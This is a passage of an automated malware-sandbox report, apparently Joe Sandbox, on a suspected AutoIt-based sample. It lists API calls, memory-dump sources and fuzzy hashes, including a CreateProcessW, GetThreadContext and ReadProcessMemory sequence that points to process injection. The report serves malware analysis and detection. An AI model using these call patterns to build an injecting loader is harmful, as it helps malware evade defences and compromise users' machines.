                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID: Control Panel\Mouse
                              • API String ID: 3677997916-824357125
                              • Opcode ID: 33f7347bde5489f20c00ca09925831944039847d0ece8a0980e93e4b4a669240
                              • Instruction ID: fe0bb9443d7d22fa169642dea5373805f737febc28797ecf9303159ab993e237
                              • Opcode Fuzzy Hash: 33f7347bde5489f20c00ca09925831944039847d0ece8a0980e93e4b4a669240
                              • Instruction Fuzzy Hash: 12114871514208BFDB21DFA8DC409AEB7BCFF15B40F008469E805E7210E2719F40A760
                              APIs
                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01101A5B
                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01101AF1
                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01101B13
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659776671.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1100000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                              • String ID:
                              • API String ID: 2438371351-0
                              APIs
                                • Part of subcall function 00885045: _fseek.LIBCMT ref: 0088505D
                                • Part of subcall function 008E99BE: _wcscmp.LIBCMT ref: 008E9AAE
                                • Part of subcall function 008E99BE: _wcscmp.LIBCMT ref: 008E9AC1
                              • _free.LIBCMT ref: 008E992C
                              • _free.LIBCMT ref: 008E9933
                              • _free.LIBCMT ref: 008E999E
                                • Part of subcall function 008A2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,008A9C64), ref: 008A2FA9
                                • Part of subcall function 008A2F95: GetLastError.KERNEL32(00000000,?,008A9C64), ref: 008A2FBB
                              • _free.LIBCMT ref: 008E99A6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                              • String ID:
                              • API String ID: 1552873950-0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                              • String ID:
                              • API String ID: 2782032738-0
                              APIs
                              • _memset.LIBCMT ref: 008BEE62
                              • GetOpenFileNameW.COMDLG32(?), ref: 008BEEAC
                                • Part of subcall function 008848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008848A1,?,?,008837C0,?), ref: 008848CE
                                • Part of subcall function 008A09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008A09F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Name$Path$FileFullLongOpen_memset
                              • String ID: X
                              • API String ID: 3777226403-3081909835
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __fread_nolock_memmove
                              • String ID: EA06
                              • API String ID: 1988441806-3962188686
                              APIs
                              • GetTempPathW.KERNEL32(00000104,?), ref: 008E9B82
                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 008E9B99
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Temp$FileNamePath
                              • String ID: aut
                              • API String ID: 3285503233-3010740371
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              APIs
                                • Part of subcall function 008A03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 008A03D3
                                • Part of subcall function 008A03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 008A03DB
                                • Part of subcall function 008A03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008A03E6
                                • Part of subcall function 008A03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008A03F1
                                • Part of subcall function 008A03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 008A03F9
                                • Part of subcall function 008A03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 008A0401
                                • Part of subcall function 00896259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0088FA90), ref: 008962B4
                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0088FB2D
                              • OleInitialize.OLE32(00000000), ref: 0088FBAA
                              • CloseHandle.KERNEL32(00000000), ref: 008C49F2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                              • String ID:
                              • API String ID: 1986988660-0
                              APIs
                              • __FF_MSGBANNER.LIBCMT ref: 008A5963
                                • Part of subcall function 008AA3AB: __NMSG_WRITE.LIBCMT ref: 008AA3D2
                                • Part of subcall function 008AA3AB: __NMSG_WRITE.LIBCMT ref: 008AA3DC
                              • __NMSG_WRITE.LIBCMT ref: 008A596A
                                • Part of subcall function 008AA408: GetModuleFileNameW.KERNEL32(00000000,009443BA,00000104,?,00000001,00000000), ref: 008AA49A
                                • Part of subcall function 008AA408: ___crtMessageBoxW.LIBCMT ref: 008AA548
                                • Part of subcall function 008A32DF: ___crtCorExitProcess.LIBCMT ref: 008A32E5
                                • Part of subcall function 008A32DF: ExitProcess.KERNEL32 ref: 008A32EE
                                • Part of subcall function 008A8D68: __getptd_noexit.LIBCMT ref: 008A8D68
                              • RtlAllocateHeap.NTDLL(01150000,00000000,00000001,00000000,?,?,?,008A1013,?), ref: 008A598F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                              • String ID:
                              • API String ID: 1372826849-0
                              APIs
                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,008E97D2,?,?,?,?,?,00000004), ref: 008E9B45
                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,008E97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 008E9B5B
                              • CloseHandle.KERNEL32(00000000,?,008E97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008E9B62
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: File$CloseCreateHandleTime
                              • String ID:
                              • API String ID: 3397143404-0
                              APIs
                              • _free.LIBCMT ref: 008E8FA5
                                • Part of subcall function 008A2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,008A9C64), ref: 008A2FA9
                                • Part of subcall function 008A2F95: GetLastError.KERNEL32(00000000,?,008A9C64), ref: 008A2FBB
                              • _free.LIBCMT ref: 008E8FB6
                              • _free.LIBCMT ref: 008E8FC8
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: CALL
                              • API String ID: 0-4196123274
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: EA06
                              • API String ID: 4104443479-3962188686
                              APIs
                              • IsThemeActive.UXTHEME ref: 00884992
                                • Part of subcall function 008A35AC: __lock.LIBCMT ref: 008A35B2
                                • Part of subcall function 008A35AC: DecodePointer.KERNEL32(00000001,?,008849A7,008D81BC), ref: 008A35BE
                                • Part of subcall function 008A35AC: EncodePointer.KERNEL32(?,?,008849A7,008D81BC), ref: 008A35C9
                                • Part of subcall function 00884A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00884A73
                                • Part of subcall function 00884A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00884A88
                                • Part of subcall function 00883B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00883B7A
                                • Part of subcall function 00883B4C: IsDebuggerPresent.KERNEL32 ref: 00883B8C
                                • Part of subcall function 00883B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,009462F8,009462E0,?,?), ref: 00883BFD
                                • Part of subcall function 00883B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00883C81
                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008849D2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                              • String ID:
                              • API String ID: 1438897964-0
                              APIs
                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00885981,?,?,?,?), ref: 00885E27
                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00885981,?,?,?,?), ref: 008BE19C
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              APIs
                                • Part of subcall function 008A594C: __FF_MSGBANNER.LIBCMT ref: 008A5963
                                • Part of subcall function 008A594C: __NMSG_WRITE.LIBCMT ref: 008A596A
                                • Part of subcall function 008A594C: RtlAllocateHeap.NTDLL(01150000,00000000,00000001,00000000,?,?,?,008A1013,?), ref: 008A598F
                              • std::exception::exception.LIBCMT ref: 008A102C
                              • __CxxThrowException@8.LIBCMT ref: 008A1041
                                • Part of subcall function 008A87DB: RaiseException.KERNEL32(?,?,?,0093BAF8,00000000,?,?,?,?,008A1046,?,0093BAF8,?,00000001), ref: 008A8830
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                              • String ID:
                              • API String ID: 3902256705-0
                              • Opcode ID: a6f36035d931d83b9368571be40e0eb1cb23c7f6f704b7de09b4ffd24d92263d
                              • Instruction ID: 21330179613f07a357f1d6e33b67e04ba139c197e6cf9ee5af678c0aa93c02ec
                              • Opcode Fuzzy Hash: a6f36035d931d83b9368571be40e0eb1cb23c7f6f704b7de09b4ffd24d92263d
                              • Instruction Fuzzy Hash: 94F0813550471DA6EF21BB5CEC0A9DF7BA8FF02350F100425F904E6991EFB18AD086A2
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __lock_file_memset
                              • String ID:
                              • API String ID: 26237723-0
                              • Opcode ID: f65520a447ff17e4be5ecc27f91e27a97a1141341d0060815c72d8624358b8ea
                              • Instruction ID: d3f5cc68ee5251e0d489bacb0163fbc2f88664bf7e157dc52d2f4b31a0d86cc3
                              • Opcode Fuzzy Hash: f65520a447ff17e4be5ecc27f91e27a97a1141341d0060815c72d8624358b8ea
                              • Instruction Fuzzy Hash: DD018871C00609EBEF11AF6D8C0559F7B61FF42760F144225F814DB561DB358A61DB62
                              APIs
                                • Part of subcall function 008A8D68: __getptd_noexit.LIBCMT ref: 008A8D68
                              • __lock_file.LIBCMT ref: 008A561B
                                • Part of subcall function 008A6E4E: __lock.LIBCMT ref: 008A6E71
                              • __fclose_nolock.LIBCMT ref: 008A5626
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                              • String ID:
                              • API String ID: 2800547568-0
                              • Opcode ID: 0bf8525f85c018c316413f0312696bbd02fdcfd610494c0d828584afd089b4fc
                              • Instruction ID: 1c3ff1106eb58e8b1420650b1e4206bba1b8c39f8aa27283759c5a648eb88978
                              • Opcode Fuzzy Hash: 0bf8525f85c018c316413f0312696bbd02fdcfd610494c0d828584afd089b4fc
                              • Instruction Fuzzy Hash: 35F09071800A05DAF720AF7D880276E77A1FF53334F658209E414EB9C1CF7C89829B66
                              APIs
                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01101A5B
                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01101AF1
                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01101B13
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659776671.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1100000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                              • String ID:
                              • API String ID: 2438371351-0
                              • Opcode ID: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                              • Instruction ID: 7d19ceca2238166eb3a2740e37258eb9c640c8a28031f7b155c8b71ac9f1dd5b
                              • Opcode Fuzzy Hash: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                              • Instruction Fuzzy Hash: E112BE24E24658C6EB24DF64D8507DEB232FF68300F1094E9910DEB7A5E77A4F81CB5A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 087ae516c63b05d26d136ea39db580e022ed4281938c0d90ce38026419ce4926
                              • Instruction ID: ba18474d58bf71c0d30e909c7c2803c9fc2b2d055cf688da9ceafd678e304cc0
                              • Opcode Fuzzy Hash: 087ae516c63b05d26d136ea39db580e022ed4281938c0d90ce38026419ce4926
                              • Instruction Fuzzy Hash: 45515C35600614AFCF14FB68C991FAE77A6FF85314F188168F946EB392DA30ED148B52
                              APIs
                              • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00885CF6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: FilePointer
                              • String ID:
                              • API String ID: 973152223-0
                              • Opcode ID: 54326fe2b1a5034384283e183be0ee2788f369007d8ee1b27896f13866864f90
                              • Instruction ID: 09b32e8564802c9eb1a94cf1df3908ab28b4ac67836fdec7814e73cc543c7689
                              • Opcode Fuzzy Hash: 54326fe2b1a5034384283e183be0ee2788f369007d8ee1b27896f13866864f90
                              • Instruction Fuzzy Hash: 32313971A00B09AFCB18EF2DC484AADB7B6FF48310F248629E819D3714D771B960DB91
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ClearVariant
                              • String ID:
                              • API String ID: 1473721057-0
                              • Opcode ID: 72c64f0ebe4fda386f607f716108b9385f20bb7f1e042ef16c590e5fe6474cc5
                              • Instruction ID: 5dc32ce9481e1ba7690a45d9d65c6e74c50a55d15aec90f1598a7bed84b5b3d2
                              • Opcode Fuzzy Hash: 72c64f0ebe4fda386f607f716108b9385f20bb7f1e042ef16c590e5fe6474cc5
                              • Instruction Fuzzy Hash: AE41E474508341CFDB24DF18C494B1ABBE0FF45358F19899DE89A8B7A2C376E845CB52
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID:
                              • API String ID: 4104443479-0
                              • Opcode ID: 46acc021f7701719685bd31058d1bf319928b5265fe0d6ec76a5632e42df60c5
                              • Instruction ID: 76ebc42a498a23e6cc09cb6e6d847580fd527e4606efc6eaeadb58b02cc61695
                              • Opcode Fuzzy Hash: 46acc021f7701719685bd31058d1bf319928b5265fe0d6ec76a5632e42df60c5
                              • Instruction Fuzzy Hash: 72115E79204605DFD724DF2CD481916B7E9FF49354B60C82EE88ACB761DB32E841CB50
                              APIs
                                • Part of subcall function 00884D13: FreeLibrary.KERNEL32(00000000,?), ref: 00884D4D
                                • Part of subcall function 008A548B: __wfsopen.LIBCMT ref: 008A5496
                              • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,009462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00884F6F
                                • Part of subcall function 00884CC8: FreeLibrary.KERNEL32(00000000), ref: 00884D02
                                • Part of subcall function 00884DD0: _memmove.LIBCMT ref: 00884E1A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Library$Free$Load__wfsopen_memmove
                              • String ID:
                              • API String ID: 1396898556-0
                              • Opcode ID: 980f5b270dbf498f3c55d701660640bf26a3bfc969ca54a2c41f0c0f6825387f
                              • Instruction ID: 3d7cccf1c7c8d265193749d49a8c6ceb1ddeb3bcba7413ef76563b7e19942468
                              • Opcode Fuzzy Hash: 980f5b270dbf498f3c55d701660640bf26a3bfc969ca54a2c41f0c0f6825387f
                              • Instruction Fuzzy Hash: C811C43260070AABCB10FF78D812FAE77A9FF44704F10842DF541E62C1DEB59A059B52
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ClearVariant
                              • String ID:
                              • API String ID: 1473721057-0
                              • Opcode ID: ad4f42a272351368e739cf1b5041bc68317dccbd1b868a5dc61e7ba3de6bc643
                              • Instruction ID: 347d29bf417d0aa8d024b0d94d35c77cb6d2742ee80a74d930a257f499c71cf7
                              • Opcode Fuzzy Hash: ad4f42a272351368e739cf1b5041bc68317dccbd1b868a5dc61e7ba3de6bc643
                              • Instruction Fuzzy Hash: 8B21FF74508341CFDB28EF54C484A1ABBE0FF85744F058969E89A87B61D731E845CB52
                              APIs
                              • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00885807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00885D76
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: FileRead
                              • String ID:
                              • API String ID: 2738559852-0
                              • Opcode ID: 08e199c7ba5d5ba3c6f331a27474ae4e417439ccb2b1fc180350a71819120327
                              • Instruction ID: 346ec799391c137fd9fee56e92d436cd2725e1ddaa574a1596d4126110cd4c02
                              • Opcode Fuzzy Hash: 08e199c7ba5d5ba3c6f331a27474ae4e417439ccb2b1fc180350a71819120327
